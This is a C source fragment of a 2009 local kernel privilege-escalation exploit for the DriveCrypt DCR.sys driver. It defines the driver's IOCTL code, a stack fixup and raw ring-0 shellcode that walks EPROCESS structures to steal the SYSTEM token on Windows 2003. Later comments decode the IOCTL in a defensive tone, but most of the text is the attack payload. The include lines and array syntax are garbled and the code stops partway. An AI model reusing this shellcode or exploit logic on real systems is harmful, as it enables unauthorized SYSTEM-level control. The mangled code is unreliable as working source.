/* drivecrypt-dcr.c
 *
 * Copyright (c) 2009 by
 *
 * DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit
 * by mu-b - Sun 16 Aug 2009
 *
 * - Tested on: DCR.sys
 *
 * Compile: MinGW + -lntdll
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
 */
#include |
#include |
#include |
#include |
/* I/O control code for the DCR.sys driver named in the file header; the
 * DeviceIoControl call that sends it is not in this chunk.  Read with the
 * standard CTL_CODE layout (device type in bits 16-31, required access in
 * bits 14-15, function number in bits 2-13, transfer method in bits 0-1),
 * 0x00073800 decodes to device type 0x7, function 0xE00, METHOD_BUFFERED and
 * an access field of 0 (FILE_ANY_ACCESS).  The zero access field is the
 * defensive takeaway: the control code itself demands no access right, so the
 * only gate is whether a caller can open the device object at all, and any
 * fix or detection rule has to key on the driver's IOCTL dispatch rather than
 * on the caller's privilege.
 * NOTE(review): the decoding assumes the driver built this value with
 * CTL_CODE; confirm against DCR.sys. */
#define DCR_IOCTL 0x00073800
/* Eight raw bytes, written as an explicit byte initializer instead of a
 * string literal so the length is visible at a glance.  The final 0x00 is the
 * terminator the string-literal form added implicitly, kept so that
 * sizeof win32_fixup is still 9.  The file header describes this as part of a
 * ring-0 exploit; where the bytes are applied is not visible in this chunk. */
static unsigned char win32_fixup[] = {
    0x89, 0xe5,
    0x81, 0xc5, 0xb4, 0x0c, 0x00, 0x00,
    0x00 /* implicit NUL of the original string literal */
};
/* Win2k3 SP1/2 - kernel EPROCESS token switcher
 * by mu-b
 */
static unsigned char win2k3_ring0_shell[] = |
/* _ring0 */ |
"\xb8\x24\xf1\xdf\xff" |
"\x8b\x00" |
"\x8b\xb0\x18\x02\x00\x00" |
"\x89\xf0" |
/* _sys_eprocess_loop */ |
"\x8b\x98\x94\x00\x00\x00" |
"\x81\xfb\x04\x00\x00\x00" |
"\x74\x11" |
"\x8b\x80\x9c\x00\x00\x00" |
"\x2d\x98\x00\x00\x00" |
"\x39\xf0" |
"\x75\xe3" |
"\xeb\x21" |
/* _sys_eprocess_found */ |
"\x89\xc1" |
"\x89\xf0" |
/* _cmd_eprocess_loop */ |
"\x8b\x98\x94\x00\x00\x00" |
"\x81\xfb\x00\x00\x00\x00" |
"\x74\x10" |
"\x8b\x80\x9c\x00\x00\x00" |
"\x2d\x98\x00\x00\x00" |
"\x39\xf0" |
"\x75\xe3" |
/* _not_found */ |
"\xcc" |
/* _cmd_eprocess_found |
* _ring0_end */ |